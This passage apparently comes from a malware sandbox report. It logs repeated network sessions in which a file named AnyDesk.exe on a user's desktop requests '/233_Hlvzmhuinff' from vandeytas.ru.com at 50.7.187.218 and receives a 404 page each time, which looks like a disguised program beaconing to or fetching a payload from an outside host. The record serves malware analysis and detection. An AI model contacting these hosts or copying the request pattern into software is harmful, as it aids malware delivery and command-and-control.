2024-11-26 07:11:53 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49839	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:55 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:55 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:55 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:55 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49845	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:57 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:57 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:57 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:57 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49852	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:59 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:00 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:00 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:00 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49859	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:01 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:02 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:02 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:02 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49867	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:03 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:04 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:04 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:04 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49874	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:06 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:06 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:06 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:06 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49880	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:08 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:09 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:09 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49887	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:10 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:11 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:11 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:11 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49894	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:13 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:13 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:13 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:13 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49901	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:15 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:16 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:15 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:16 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49908	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:17 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:18 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:18 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:18 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49915	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:19 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:20 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:20 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:20 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49922	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:22 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:22 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:22 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:22 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49929	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:24 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
